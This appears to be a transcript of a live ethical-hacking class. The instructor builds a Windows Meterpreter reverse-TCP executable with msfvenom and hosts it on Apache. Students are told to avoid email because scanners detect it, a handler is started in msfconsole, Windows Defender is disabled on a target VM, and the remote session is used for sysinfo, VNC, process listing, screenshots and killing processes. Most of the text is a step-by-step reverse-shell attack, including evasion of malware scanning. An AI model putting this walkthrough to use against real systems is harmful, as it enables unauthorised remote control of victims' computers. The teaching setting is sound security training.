Venom -p Windows interpreter reverse TCP. Platform, it's Windows -A 86 architect -F, the exe extension. L host, we need to provide our IP address. So for that, let us find out the IP address. Okay, so our IP address is this is our IP address. You need to provide our IP address here. Then L port 444 hyphen output, where we want the output to be stored. So let us store in the root. Stop. The name will be test. .exe. And now, before running the command, you need to make sure that sudo is attached in the beginning, or else it won't work. Sudo. Now, the entire command is ready. Now we need to run this command. Before that, let us move back to our PDF. Does L port varies every time like different systems? No, L port is same for every condition. It's 444. Okay, L port is same because we are doing the TCP reverse connection here. Okay, so the TCP connection only establish a secure tunnel over 444 port. P is parameter. No, P is not parameter. P means payload. The payload we are here we are using is Windows interpreter reverse TCP. This is the name of the payload. How do we find out the port? I'm continuously telling this from last 15 minutes that port number is 444. You don't need to find any port number. Why are not focusing on class? Port number doesn't change. Port number is static every time. 444. The IP address is the IP address will be different. Okay. The IP address is the IP address of your system. Of your system means the Kali Linux or whatever system you're going to perform the practicals. From wherever you are going to use a MSF Venom, for that system you need the IP address because a particular system will be creating the tunnel connection. Okay. Now let's go back to our this one. Okay, location we are giving wrong. What type of location do we need to provide? Okay, so you can see here our payload is now this one. Our virus is now generated. Okay, desktop. It's on desktop. Let us minimize this one. So here is our virus test.exe. Now the second step is to share this file to our Windows target. How we will be doing this activity? Anyone, if you remember whatever I told, let me know how we will be going to share this file to our target. Okay, some of you are saying through email, drive. Let me tell you all that we are sharing a virus. So virus cannot be transmitted using email or Google Drive. Okay, Google can easily detect that it's a virus. So we need to share this using a pen drive, using our own server. Okay, if you have your own server, you can do that. If you have your pen drive, you can do that, or through some different sort of methods also. Right now, we are going to create a local host Apache server. So right now, we are going to share it through Apache server. Okay, so as I'm already having a Apache server in my laptop, okay, I just need to boot the Apache server and then just share the file. So how to do that? First of all, whatever uh, file we have generated text.exe, we need to move it to the Apache server folder. So Apache server folder generally resides in var www html share folder. If you don't have this folder, just use the command mkdir. Okay, mkdir var www html and share. Make this directory chmod will change the permission and then chown. And in this folder, whenever we create this folder, we need to move our .exe file to this one. Okay, so we just need to use the cp command and move the test.exe to our var www html share for this one file. Okay, so the command will be cp location of our this one, and in var www html share, here we need to share the file, and then we need to start our Apache server. Let us do this one. chmod and chown is used to change the mod of the file, readable, writable, executable. If you remember, I have told you this in the beginning of the course actually. What is the use of chmod and chown? So just try to focus on each and every class, as these are the common terms which I already told in the previous classes. Now we have the exe file. Now we need to move this file to our this thing, Apache server root folder. Okay, so sudo cp home desktop test.exe. We need to move this to where www html share. Okay, now it's moved to the particular folder. Now we need to start our Apache server. Service Apache to start. Okay, sorry, sudo service Apache to start. The service is started. Okay, now what is the IP address of our system? What was that? What sudo means? Sudo is a command which is used to perform actions forcefully. Okay, well, I'm not the root user of Kali Linux. That's why every time when I need to perform something which needs admin privileges, we need to use sudo commands. Okay, suppose you are using a command and you are not able to use the command. Okay, so in that case you need to use sudo. Sudo means to perform this action forcefully. So anyhow it will execute. Apache server is available in Kali Linux, or we need to install. Apache server is available by default in Kali Linux. You don't need to do anything. Just create directory where www html share using mkdir command, and just use this command service Apache to start. It will automatically start. And now let us find what is the IP address. Okay, again let us check out our IP address. What was that? 192.168. Yes, it's compulsory to run Apache server in Kali Linux. Okay, so let us go to IP address 192.168. Okay, this one is the IP address. The Apache server is running. Okay, this one is the Apache server of Kali Linux. Now let us browse the file where it was. So test.exe, I think. Okay, sorry. First of all, okay, the Apache server is currently running. Okay, as we can see, Apache server is running. So the software is ready, the virus is ready, and the Apache server is ready. Now the second step we need to do is we need to start the poisoning. Starting the poisoning means we need to start our MSF console where we need to execute our payload. Without that, we cannot establish connection. We can download the software, but it won't work. Okay, we will not receive any connection. So in that case, we need to start our MSF console. So MSF console is the command. Let me write it down in my notepad. MSF console. So MSF console we will be using. After MSF console, use this command. Use multi-handler. Multi-handler is a type of connection which we will be creating. Use multi-handler. After multi-handler, we need to set our payload. Okay. The payload, we have created a software test.exe. Now we need to execute or set the payload. Whenever it is active, we can start our exploit. So set payload, the name of the payload, Windows meter preter reverse TCP. This is the payload. We will be executing it. Then we will be setting the L host, the L host of our Kali Linux. Set L port 444. It will configure, and then after that we need to type start the exploit. So after typing the exploit will start. Okay. Now let us move back to our Kali Linux. So let us close this one. Okay, clear out these all things. Sudo meta exploit. Sorry, what was it? MSF console. So you all can see it's starting now. Okay, now the MSF console is started. Okay, now what we need to do is we need to use multi handler. After that we need to set the payload, set payload Windows meter reverse TCP. Hit enter. Set L host. What was the IP address? 192.168. One three nine one three one. Sorry, 139.131. Set L port 444, and then exploit. So the TCP handler started on the following IP address. Now, right now we are not receiving any logs, which means there is no connection going on. So our victim is not currently having the software installed in his system. Now, let us go back to our Windows operating system and install the software. So go to this share folder. We have this test.exe installed here. Sorry, either present here. Click on this. It will download. And then you can see your antivirus detected that it's a virus. Now let us deactivate our Windows Defender. So here we have disabled our antivirus. Now let us again download this. Now it's downloaded. Okay. Now click on the software. Okay. Let us see here if it's there. Is there anything? No. We have not received anything till now here. Okay, whenever we install the software, it will start receiving the connection. Okay, let us minimize this. More info, run anyway. Now it's running in the background, and you can see we started receiving the connection here. Started reverse TCP handle on this one, sending stage this one is the IP address, mid repeater session one open, and currently we are active with the Windows operating system. The IP address 192.168.139.1 is the IP address of our Windows operating system. Now we have the access of Windows operating system. Now we can do anything in this mid repeater connection. We can even take screenshots. We can even view control the system remotely. We can see the tasks going on the current Windows operating system. Let us go back to our this one module. After having the connection, okay. Now let us first of all find out the type system info. So for that we can type sys info. So we can see the system we are currently connected to is laptop. This one Windows 10 operating system, architecture 64, language, work group, logged on users 2, meter Twitter connection going on. So we can see the system info. Now let us do some different things. Now we will be creating a VNC session to capture the access of Windows 10. Okay, so we will be run VNC. Okay, so this type of thing is happening because we are using virtual machine. That's why we are getting the image of our this thing virtual machine one by one. Okay, let us terminate this one. You are able to see this one, everyone? Is it this one is visible? So the remote connection is connected. Why it's showing like this? Because we are currently using VMware and it's showing VMware under VMware under VMware under VMware. That's why it's happening like this. If you're using some different system, it won't work like this one. Okay. Just first of all close the connection, or else it will. Okay. Now it's closed. Let us try to do some screen. This one screenshots. Okay, before screenshot, let us do this one. PS, processes running. So we can see here, these are the processes running in the laptop. Runtime broker, these are the processes currently running in my laptop, Windows, Chrome, Okay. These are the processes running in our target system. So PS is used for this one. Now let us find out the screenshot command. Screenshot. Let us store this one in home. Desktop. Screenshot saved. Let us find out the screenshot. It's saved here. It's open here. Okay. So here is the screenshot. This one is a screenshot we have taken. Okay. So close this one. Could we stop one of those processes? Yes, we can stop any process. We just need to type stop and the process ID. This is a process ID. Okay. I hope this is the process ID. Just a second. Sorry. Yeah, this is the process ID. So you just need to pass this process ID following stop. It will stop the process ID. Stop PID number, and it will stop the process. I hope it's clear to everyone. Any confusions here? Everyone? Extract all images. Not getting your point. What do you mean by extracting images? All images. Please clarify this. No, you need to take screenshots one by one. It's not possible like that. You need to take screenshots one by one. Yes, you can also do the folders import also. We have different sort of commands for different sort of uses. You can even shut down the system, but we cannot perform this right now. If I shut down, my whole system will go offline and the class will end. Do you want to shut down my system? Everyone? Okay. So is there any confusion? Anyone? You can ask in the live chat. If you are having any confusion, please ask in the live chat. Today we did this practical, which was very important. Then in the next session, we will be moving to